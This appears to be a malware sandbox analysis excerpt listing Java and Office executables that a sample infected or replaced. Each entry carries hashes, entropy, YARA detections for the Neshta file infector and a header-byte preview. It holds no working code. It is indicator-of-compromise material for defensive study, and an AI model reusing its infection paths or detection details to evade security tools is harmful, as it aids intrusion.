                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKHLgwHz2xi03XxQy012eqZwE:sr85C/qMsc2Y03BQz2eqZP
                                                                        MD5:7132D6785E73B1159F3AC9AC5DE71A1C
                                                                        SHA1:0EF8C262E63E3776662064D00E5C4264D0213C8B
                                                                        SHA-256:629945249C52DDB4108FF5C239D4E2C79C92A545ECD25DAE395697831D648A5F
                                                                        SHA-512:804BD2E14C52D226F1D470D0C73B3DE7945EA24EA4554D916FF796E24F6C7C6B5A21284396C6359CBD94ACCE87517D19984F207FEED537AE9DDE8C29D04D2A9E
                                                                        Malicious:true
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.346606571165856
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCOLIFaIz9SEhJyurf6S1TWfavAd3VbB:sr85Cb7hfFTkd33
                                                                        MD5:95ED8DD6C4D471F68911840679CA1F9B
                                                                        SHA1:5BDD0A4778F72B6AC95FEEFF108F74E342981690
                                                                        SHA-256:82B98FAF27483CB4C8957A2BC6306C47D59559046C8DCDC03C708C77C36E2417
                                                                        SHA-512:581BD049EDCEC4E330FEC670AF7B2980F1B338FC8588B596555803A43B0BE4232A3376CB314C8F3C9DC615D892D80746EB2E1C60766BDB7E046515DB9751DD8B
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.107296013528715
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCWnoDdvhQBW1kqanjaYt6Zs8:sr85CaEQQhanIZs8
                                                                        MD5:4141A0DE0BCBE19FA9E93DB323462679
                                                                        SHA1:88F7E506A247D882C4F4E924D1E3DAB0FC077387
                                                                        SHA-256:3CD849C610540723B3785865DFCC8F65B820003251B39ED6594A8A979F20E948
                                                                        SHA-512:940ED87A4C20AE138D388D2324AEBCCA2FC4C93B8D8C2443E91EB382937F79B55BDAD03F595C4EF3FA94D0EC087EA3C228ABB143BBCB79C554E5C3FA38CAA754
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.242980084696127
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCZqO55PvVT4zHu+wLZ8qU:sr85CIO55PvV8HVwLZ8qU
                                                                        MD5:18E80CD6901FFDEDD81B44D0526240D4
                                                                        SHA1:640A66FC69235A0B3677A010376FC607CC2B50E6
                                                                        SHA-256:3A70FBA9C369E6FC2DB35AF45D1201833ADEB33B1ACE24603A582D2BACE6ACDF
                                                                        SHA-512:4F62E2168BFCFD0329F12F93FB5783B9D70989852CF9C12339FDED1ACC5C984FCC847555DD223C6EE2C3CEF64DD95F580DB31138F9D2F47E68FF2F6106A3BED3
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.2705620011183765
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCFtwbWR/v1o/G42UR9whwRrcUTR9EhhBhc:sr85CpnD9UR9whwtvTRMBy
                                                                        MD5:F56F560D473A7660D3AD44E731930A06
                                                                        SHA1:B71090C328FF4234B213D76689591DE15DEBD0F3
                                                                        SHA-256:9B7384DC0D5DBA8C5161DB5C42D3075A4281716F741F10DEF974C5C680308CD0
                                                                        SHA-512:0134B6C093C053343177A83B81A23EEE54BF4C655958906B854B221B85097D633FA96953B83343F6C207BE5A15919017EA26C05DD3B46193618FC26510C6E74F
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):5.110851138659397
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCIbgvgvwvEvFvwYF57LoW8dwhFz7Oos8iwiFT7XMvNvev0vUvZo:sr85CIbMMc4ZTTfRyKFifVlt7wx+oIVg
                                                                        MD5:4DA76295D7246E94AC917F192A2ACE84
                                                                        SHA1:58964579A019BEAB01488F1B1FD0A83C4A38B0CB
                                                                        SHA-256:D1D94327BEFFD6F453E862BFE9B715C980B20F33F38C8825AA2B2DF1DF33F9A5
                                                                        SHA-512:8811B0CC2BDE08B9354AC1F84F441F7E3D11A31D7E5D25139E53DA4C2C2E99645A1F37FAA7FD043B4FCC1169DB59FF4F7BA8EAC9CAC14CD455B3CCD34B6BAAD2
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.46960810763993
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCwMkBExFhpgLTGlrFBbeEOCr:sr85CJ7uTGlr3iE5r
                                                                        MD5:3AE73C8D42CF093E893717A04A20D5F8
                                                                        SHA1:96384CCD613D795E953BFD876250C86007EF74D6
                                                                        SHA-256:BAE7AFCEBAEF2A3BB243EFAF1305AED127D21B978D7C4335109F2A403A4C2CE1
                                                                        SHA-512:C90A74241A93652AB10BD6E1D476D89C995C7749938B83877C14A8F9496959C8868F21239DC6C468629852D154621E310CA76FB4C50DF8C02626560D48F96E07
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.448388258977007
                                                                        Encrypted:false
                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJZyKcXJKtm61b0fth1uvh/NYANLOT9j/:JxqjQ+P04wsmJCRXJQm62t+vTaT9jxd7
                                                                        MD5:8BA32D4C4C59A22D2A5A1BEAB8B004C7
                                                                        SHA1:AA91417C5BA67F09E743A7740662EED65C4873EA
                                                                        SHA-256:2B0E0FBC461BED861EAF961F5058A18252A8A517008660D46063A1DCDF10DD02
                                                                        SHA-512:07B9A4827EFDE249FBD6953ABE3559A589500534E8DBAFF12C65EAD40FDE51395822BD265AE48D271ECB825BF6EDEC3D7CB7D2D96FFCBB3AA167FF7FC1A64AF4
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.285196024262785
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCVJQEW8SSfaU/VEwdwzfnuktR9KJMkW:sr85CbQE2SkXFKJMt
                                                                        MD5:2355BC5DCE8E63203BD523F6A3EF11C9
                                                                        SHA1:06E09B957EC99F2635D39BD9D3EF6FB8C26FDD8F
                                                                        SHA-256:37D5B62049B2ECBAC53E3126E68E2FA0416A2E220C97E9951BD71FFF52E514A9
                                                                        SHA-512:71BCE642EDC4355E8CD217442EE6AEB1AA536069FAACA69633EF3B508A6E523FA2386A7EF841FC84F9EAF475725368DCC2CED0C0D4C13B170EE789A69FFDDCD7
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.72011826313205
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCa9IKr1BRo+SYZMuIb3eJG53B:sr85CaDr1BRo+SYZMuW32GhB
                                                                        MD5:BD61FF1B20A7530ECF797894EE1316DC
                                                                        SHA1:A9601D8B56C247B801E5D5A89377EEFA6FF37FA2
                                                                        SHA-256:29F10DE4B67C8BF585A581AE8893069FA52214A18CC4444D3E207A7A657EBD02
                                                                        SHA-512:CD91235FF8ACC7D8263EF05028E728E0BBA90D9459B3FD86568C7149DFF55F1E3E010C5234C234DA87B2CBFBE7B8C71DFEDD9E8C5BB326146579CA9EAD90055F
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.169493808225336
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCslMDFepJnQxbMwwNOhO8WSnWR0Oj:sr85CsaeYyiL7WR0k
                                                                        MD5:8F4A79DC0DD71E8CA092D84C0260F92D
                                                                        SHA1:CEB13BACFAE68CFE94561487FC6E0AE0464C6A58
                                                                        SHA-256:2480D138EE436D182337435EF36F9A895ED9A98DA620C752976D575C08ECD390
                                                                        SHA-512:A100A527B654FE476672B7809A4C73F8C523C2620815476CF8D994E1553A344CFE4191FDF8641719D52B29743D625574A9287EF51BBF343B5D8FDD428FE68D33
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.3186383734960625
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCDnCgs1pSd8MvYMRLWjqov/M:sr85CD+4DFLWjlXM
                                                                        MD5:B4F5C898517A6B40402611BF65397423
                                                                        SHA1:F6E1F64CA7C05131682153B67E5EF5C54533F1DE
                                                                        SHA-256:E634A7EECA5A30B359DD622BA3A3BDBF5729173A416C86C962647B2B7A1F286C
                                                                        SHA-512:C510990B72E1FCD1007B38B0A9F4A28280E909D2AC81AE08F106EC482423927EE13081B89DA316D44EDC6FF684C3C3FB93E898705D6D7E7640612560C494E5CA
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.392056642854633
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCjCTi/Y5cIzwdi9Jo5wJ8RNjRmBF2XFAkrfkGj:sr85CGT/5Lz8RNIBAXFdrtj
                                                                        MD5:77E4E96AC817B6D2DCC671C75B3AF7D5
                                                                        SHA1:2B3C254A156F9CD60BD9EF5B5832C7BC8F7FF9E2
                                                                        SHA-256:657B05CB38BED57B93383818722F9058FED9966D1CDA1AB5A00034CB0F6E9A0B
                                                                        SHA-512:F4F835B4004C5BF7C7ECB7DF6179EEF8DDDF277B13609A4ABE5AF4A748AD27A6207020E6A9E5301C89C0FF689CFCD99234245BB621CCC94A3E2A9B930DA63B0F
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.496755886640026
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCJ5SSe4emv59S7OJvwgUQn73bPrI3SZ:sr85CJte4eK58i6gUQ7LL
                                                                        MD5:C5ECA751B54F507CCB797556E24D9EDA
                                                                        SHA1:30949D80A7FC4778ACCD14FA9A35B3910F0C96D2
                                                                        SHA-256:8F2BF3E7F90A0A85C2B121E448BF1C0BD8B5C8B860E64C1ABF64DBBA8C20111C
                                                                        SHA-512:AD1B5E374C615E92EFFD6E789BCFEB99D7DBECBCBB4DA4ABF013DE911E5BA8B6B14F836836EA8EC949F1652ABB29A32204FF5B9BF843C85ACC1453DCAB162C64
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.268163712816429
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCdi4v7jFil6gu4ayPdTTFDiopJLN:sr85Cc4vHFs6gu4aCdPFDi2
                                                                        MD5:1EF797E5E199041B8A0EB41A50E73185
                                                                        SHA1:2D059C707E2738DD623FF8E4D336D8B90B482451
                                                                        SHA-256:0BB888F08C57AD222A544EB3A73478B4747059277A80F21A03E5655FA21CE119
                                                                        SHA-512:3B08845C01002AF7B35A5BCDCA1D984D7D019EE117F0CB761E3DA608329314067DA1A16ABEBC8AA3FCB602EC58EA77D0F1EE3FC288142DDD0F44970BF431BC77
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.201681837230837
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCpSsTITDBkt+ETGBaORneubkuJ:sr85C7IvibTCaOFeubks
                                                                        MD5:D528E65D0A3CFF610803965BAB5D42EE
                                                                        SHA1:A01448DD0C03BAF9B1E287BCB87A58450084BFFA
                                                                        SHA-256:C82DAD16438E79EE2ABC34D1B405F09DE3844FDEF99F9115B58E7D1F7C90C4E9
                                                                        SHA-512:4A0C3C8F49CE25A4D5D06359683DE444EDFC6B49E09323D10F675E5029D584135A80F89A04FE77CB58D4B9BC6522F7E2DC359FC8D6EB8A55F981AB4CC07B91F3
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.352529349012904
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCkb7zbeu8L16Ytx2XaRSX2qA4i:sr85Ckb7Heu8LSakmP
                                                                        MD5:2249CAFC0B359EA41F137AB87DC151FA
                                                                        SHA1:DABA42EFF4B9D3251E409CFD98A2BD3B9A672ED3
                                                                        SHA-256:3478297533C741CBF62D8FA8F2D820089E3777EBFD6DCDAD50F8FBCF93FB6304
                                                                        SHA-512:D0684A20BD7449D97323DBBE93467148F7E63DB79EC1BD3AC2E90D1350148EDF6F31E7BBEE1F32773D169CD04E1D11FEF03AE2E2C5637A89288FFB08C8115DB5
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.46773744909196
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCxvuAvYalUpgotzYIlHkHwt7//Qt:sr85CqaBotvHkHwK
                                                                        MD5:F3279F5053B3112B5299C08136AE58E9
                                                                        SHA1:5B4C8EA82DC1E296CB31EC7B439B8B6E52795995
                                                                        SHA-256:1A1E7090747C3F600989939E12DA73BD2E85FFCAD10159E7AC52D374DA11874A
                                                                        SHA-512:86A355429C9358EEC0FE6B95623DC26FE7879684CDDB6AEAE293276FC5D604CC37DE64FC520F0EE749A3F6A15E9D5FB53852F9B444A0B3DE1374077578A99564
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE, Author: Joe Security
